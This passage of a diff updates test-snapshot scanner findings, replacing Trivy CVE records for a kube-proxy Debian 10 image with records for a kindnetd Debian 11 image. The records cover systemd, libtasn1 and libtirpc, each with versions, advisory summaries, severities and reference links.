"value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u7", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-48", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "privilege escalation via the less pager", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc-common", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://security.gentoo.org/glsa/202210-33", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://ubuntu.com/security/notices/USN-5538-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.debian.org/security/2022/dsa-5200", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc3", + "references": [ + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", + ], + }, + "category": "Vulnerability", + "description": "In libtirpc before 